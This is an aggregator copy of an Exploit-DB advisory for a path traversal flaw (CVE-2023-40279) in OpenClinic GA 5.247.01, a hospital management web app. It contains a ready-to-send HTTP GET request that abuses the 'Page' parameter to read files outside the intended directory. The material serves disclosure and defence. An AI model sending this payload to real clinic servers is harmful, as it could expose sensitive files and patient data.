2

[webapps] OpenClinic GA 5.247.01 - Path Traversal (Authenticated)

 3 weeks ago
source link: https://www.exploit-db.com/exploits/51995
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

OpenClinic GA 5.247.01 - Path Traversal (Authenticated)

EDB-ID:

51995

EDB Verified:

Author:

VB

Type:

webapps

Exploit:

  /  

Platform:

PHP

Date:

2024-04-15

Vulnerable App:

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Date: 2023-08-14
# Exploit Author: V. B.
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279

# Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.

# Proof of Concept (POC)
Steps to Reproduce:

- Crafting the Malicious GET Request:

- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):

GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0

2. Confirming the Vulnerability:
- Send the crafted GET request to the target server.
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
- This vulnerability can lead to sensitive information disclosure or more severe attacks.

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK